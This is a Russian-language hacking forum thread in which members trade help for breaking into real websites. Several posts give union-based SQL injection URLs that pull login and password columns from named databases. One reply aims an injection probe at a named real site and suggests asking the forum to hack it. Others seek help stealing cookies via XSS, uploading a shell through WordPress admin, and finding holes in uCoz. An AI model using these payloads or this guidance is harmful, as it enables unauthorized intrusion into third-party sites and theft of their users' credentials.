Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    да это хня, вон нерезус сайт на осенблере писал )))
     
  2. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    sql_injection???

    нашел sql injection на одном сайте все стандартно....
    site.ru/index.php?id=-1+union+select+1,2,3,4...../*
    version() -> 5.0.37
    user() -> не рут
    через INFORMATION_SCHEMA.TABLES можно просматривать таблицы...
    на этом же сайте есть форум адрес типа forum.site.ru

    как я понимаю через "INFORMATION_SCHEMA.TABLES" я должен видеть таблицы форума или же нет?
     
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    не обязательно
    таблицы форума могут быть в другой бд и у юзера может не быть прав на доступ к ней
    или вообще forum.site.ru на другом серваке лежит
    Пробей через ревёрс айпи
    http://www.seologs.com/ip-domains.html
    если они на одном серве, просматривай table_schema и все таблицы
     
  4. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    ip точно один.... если они в другой бд то получается я уже до них не доберусь ?
     
  5. rem

    rem New Member

    Joined:
    9 Nov 2006
    Messages:
    24
    Likes Received:
    4
    Reputations:
    1
    доберешься если сможешь повысить свои привелегии либо через ,fpe дибо через скрипты
     
  6. RinOS

    RinOS New Member

    Joined:
    18 Dec 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Уязвимость через ошибку FatalException

    В общем при передаче переменной query строки возникает ошибка:

    http://site.ru/js/rs.php?query=SELECT *

    Fatal error: Class 'FatalException' not found in /opt/vhosts/jnet/www/lib/DB.php on line 241

    Что значит эта ошибка, и можно ли использовать уязвимость сделать sql иньецию?
     
  7. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    вобщем то, эта ошибка не говорит о том, можно ли или нет провести инъекцию, просто когда возникает ошибка, вызываются функции определенного класса, а этот класс скрипт просто не может найти и все, попробуй сделать правильный скуль запрос

    да скуль есть, вот нашел:
    Code:
    http://site/js/rs.php?query=1%20union%20select%201,version(),3,4,5/*
    смотрим исходник страницы, видим
     
    #867 Scipio, 4 Feb 2008
    Last edited: 4 Feb 2008
  8. ~Taxa~

    ~Taxa~ New Member

    Joined:
    24 Jan 2008
    Messages:
    19
    Likes Received:
    4
    Reputations:
    -1
    Прошу помочь если вообще способы залившке шелла через админку WordPress'a?
     
  9. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    хорошо а могу я прикрутить UPDATE? и как это должно выглядить...
     
  10. MarvinsMagic

    MarvinsMagic New Member

    Joined:
    29 Jan 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Буду признателен если

    Всем привет , в кратце обьясню , всю жизнь работал СИ , вполне успешно никогда не жаловался =) ! Сейчас встал вопрос скажем так прогресса , вопрос куда двигаться от чего плясать , ЗАРАНЕЕ извеняюсь если задам кучу глупых вопросов , всё что я прошу подсказать , дальше сам разберусь .
    есть сайтик нуу допустим http://portal.kurkino.net.ru/ насмотревшись всяких крутых роликов я начал с дуру подбирать всякие словечки в итоге нашёл "test.php" "/test/" "/test/admin/" как я понял сервак стоит на апаче , нооо дальше я не ушёл , и вот в чём просьба , скажите пожалуйста , а лучше киньте ссылки на статьи , предположим цель ну скажем выведать пороли пользователей или пороли админа , какие технологии и вообще знания стоят применять , Всё что связанно с соц инженерии сразу отпадает я и так всё знаю , уже не интересно , я крайне надеюсь что вы поняли чего я хочу , просто подскажите что к чему и зачем . Заранее спасибо

    П.С.- с удовольствием возьму уроки(естессно не бесплатно) у знающего дело профессионала , который мне всё разжуёт ! Спасибо за внимание. Не судите строго.
     
  11. x88x

    x88x Elder - Старейшина

    Joined:
    27 Nov 2007
    Messages:
    208
    Likes Received:
    119
    Reputations:
    16
    хм...
    на роль "знающего профессионала" я не претемндую, но все же выскажу парочку своих соображений:

    1. во-первых, (хотя это дело вкуса) посмотрел бы движок сайта. что-то мне подсказывает, что там должна быть скуль (SQL-inj).
    http://portal.kurkino.net.ru/portal.php?module=news&view_gid=4'
    Про скули почитай в этой же ветке форума.

    2. во-вторых, сайтец построен как минимум на двух движках:
    - движок сайта - смотри в самом низу страницы: Portal System ULN-Web. Зная PHP и имея на руках исходные его коды можно самому найти уязвимость в двиге. Как вариант - пошерстить по багтракам - мож уязвимость там уже нашли.
    - движок форума - см. выше.
    А вот для изучения исходников тебе понадобится выучить PHP. На ачате для этого материалов предостаточно.

    И вообще, как вариант, можешь, опять же на форуме просто попросить взломать сайт =)

    удачи...
     
  12. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    m0use, ты видишь все таблицы SQL, там же будут и от форума.
    UPDATE имя_таблицы SET поле=значение
     
  13. ONEx

    ONEx Banned

    Joined:
    3 Feb 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Пассивный XSS
    --
    не подскажите почему не работает мой скрипт? мой скрипт -
    по сути это
    а в оригенале
    xxs-xxs.nm.ru/js.js - там
    Помогите плиз разобраться =(
    И еще вопрос.. если тырю куки с zzz.ru то и дыра должна быть в zzz.ru ? Спасибо
     
  14. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    bobob, возможно таблицы находятся в других базах. Узнай базу таблицы:

    ... , concat(table_name,0x3a,table_schema), ... +from+information_schema.tables

    а потом пиши имя базы перед именем таблицы

    ... ,password, ... +from+имя_базы.users/*


    А возможно просто нету доступа к этим таблицам :\
     
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Типа такого

    script.php?id=-1+union+select+1,2,password,4+from+used.used_users/*
     
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    bobob, ты читал мануалы по инъекциям ? )) Перечитай )))

    Допустим у тебя есть таблица calendarusers. Тебе нужно узнать в какой БД она находится. Для этого пишешь запрос

    script.php?id=-1+union+select+1,2,table_schema,4+from+information_schema.tables+where+table_name='calendarusers'/*

    Допустим в ответ вывело - firstbd. Тогда составляешь запрос

    script.php?id=-1+union+select+1,2,concat_ws(0x2F,login,password),4+from+firstbd.calendarusers/*

    Теперь делай по аналогии
     
    2 people like this.
  17. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    55
    Likes Received:
    8
    Reputations:
    0
    Втом то и дело что некоторые таблицы я вижу а именно таблиц форума я не нашел.
    как это в брайзере должно выглядеть, методом тыка уже пробовал и UNION добавлял и без него... поэтому и спрашиваю как правильно!?
     
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Уязвим ли следующий код php:
    PHP:
    if(!isset($_POST['adminusr'])) $_POST['adminusr']='';
    if(!isset(
    $_POST['adminpwd'])) $_POST['adminpwd']='';
    if (
    $_POST['adminusr']==$admin_usr and $_POST['adminpwd']==$admin_pwd) {echo "зашли!";}
    else {echo 
    "идём лесом";}
    При условии что спецсимволы не экранируются, т.е magic_quotes_gpc = 0?
     
    #878 -=lebed=-, 5 Feb 2008
    Last edited: 5 Feb 2008
  19. A2GIL

    A2GIL Elder - Старейшина

    Joined:
    31 Aug 2007
    Messages:
    84
    Likes Received:
    59
    Reputations:
    -3
    А ты пробовал использовать limit?

    Запросы типа UPDATE работают крайне редко! Такая фишка с изменением базы не катит!
     
  20. Sharingan

    Sharingan Elder - Старейшина

    Joined:
    5 May 2007
    Messages:
    143
    Likes Received:
    147
    Reputations:
    16
    народ, может кто знает уъязвимость на укозе, хсс там или еще что, срочно надо, искал не нашел =(
     
Thread Status:
Not open for further replies.